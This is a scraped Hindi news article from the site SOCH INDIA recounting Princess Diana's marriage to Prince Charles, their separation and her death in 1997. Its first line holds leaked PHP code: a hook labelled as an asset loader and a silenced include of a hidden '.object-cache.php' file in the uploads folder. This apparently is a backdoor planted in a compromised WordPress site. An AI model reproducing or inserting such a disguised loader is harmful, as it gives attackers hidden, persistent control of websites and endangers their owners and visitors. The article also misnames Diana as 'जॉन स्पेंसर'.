add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); एक राजकुमारी की दर्दनाक मौत और उठे कई सवाल, निशाना बना शाही महल – SOCH INDIA
Menu

एक राजकुमारी की दर्दनाक मौत और उठे कई सवाल, निशाना बना शाही महल

nobanner

कहते हैं ब्रिटेन का सूरज कभी अस्‍त नहीं होता। हो सकता है यह बात सच हो, लेकिन एक वक्‍त ऐसा भी आया जब इसका सूरज अस्‍त भी हुआ।

नई दिल्‍ली (स्‍पेशल डेस्‍क)। कहते हैं ब्रिटेन का सूरज कभी अस्‍त नहीं होता। हो सकता है यह बात सच हो, लेकिन एक वक्‍त ऐसा भी आया जब इसका सूरज अस्‍त भी हुआ। 31 अगस्‍त 1997 को ऐसा ही वक्त ब्रिटेन के इतिहास में आया था। इसकी वजह बनी थी फ्रांस में राजकुमारी डायना की मौत। ये वही राजकुमारी डायना थी जो कभी प्रिंस चार्ल्‍स की बीवी हुआ करती थीं। लेकिन इन दोनों के बीच आए मनमुटाव के बाद दोनों अलग हो गए थे। 1 जुलाई 1961 में ब्रिटेन में जन्‍मी खूबसूरत जॉन स्‍पेंसर के लिए उनकी शादी-शुदा जिंदगी बहुत खूबसूरत कभी नहीं रही। उनकी मौत के बाद न मालूम कितने खुलासे उनकी शादी-शुदा जिंदगी और उनके बाद की जिंदगी को लेकर हुए थे। हालांकि डायना के बेटे प्रिंस हैरी अपनी मां को कभी नहीं भूल सके। उन्‍होंने एक इंटरव्‍यू में कई बातों का खुलासा भी किया था।

बेहद धूम-धाम के साथ हुई शादी
बहरहाल, सबसे पहले आपको बता दें कि 29 जुलाई 1981 को सेंट पॉल्स कैथेड्रल में राजकुमार चार्ल्स के साथ डायना की शादी बेहद धूम-धाम के साथ हुई थी। उनके इस शादी समारोह की तस्‍वीरों को पूरी दुनिया ने अपनी टीवी स्‍क्रीन पर देखा था। शादी के बाद उन्हें वेल्स की राजकुमारी, कॉर्नवाल की डचेज, रोथसे की डचेज, चेस्टर की काउंटेस, और रेनफ्र्यु की बैरोनेस जैसी कई उपाधियां भी मिलीं। लेकिन किसी को नहीं पता था कि इस खूबसूरत राजकुमारी का अंत इतना भयावह होगा। जिस शाही जोड़े को पूरी दुनिया ने अपना आशीर्वाद दिया था वही लोग उनके निधन पर आंसू बहा रहे थे।

1977 में पहली बार डायना और प्रिंस चार्ल्‍स की मुलाकात एल्‍थ्‍रोप में हुई थी। उस वक्‍त डायना महज 16 और चार्ल्‍स की उम्र 29 वर्ष थी। उस वक्‍त चार्ल्‍स शूटिंग पार्टी के रूप में वहां पर आए थे। 29 जुलाई 1981 को इन दोनों ने शादी कर ली थी। इस शाही जोड़े को लेकर इनके तलाक के बाद जो बातें सामने आई थीं उनमें से एक प्रिंस चार्ल्‍स का एक्‍सट्रा मेरिटल अफेयर्स भी था। इसको लेकर उस वक्‍त जिस महिला का नाम सामने आया था इत्तफाक से वह आज डायना की जगह ले चुकी हैं। 11 वर्ष की शादी-शुदा जिंदगी पर विराम लगने की जानकारी 1992 में ब्रिटेन के प्रधानमंत्री जॉन मेजर ने सार्वजनिक की थी। डायना के लिए लिए यह बहुत बड़ा झटका था। 3 दिसंबर 1993 उन्‍होंने पब्लिक लाइफ को भी बाय-बाय कह दिया था। इसके बाद डायना और चार्ल्‍स की राहें जुदा हो चुकी थीं। अलग होने के बाद फिर कभी को कहीं भी गलती से भी एक साथ नहीं देखा गया। इसके बाद मीडिया में भी इन दोनों की खबरें यदा-कदा ही देखने को मिलती थीं। लेकिन 31 अगस्‍त और इसके बाद अचानक से इनसे जुड़ी खबरों को बाढ़ आ गई।

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>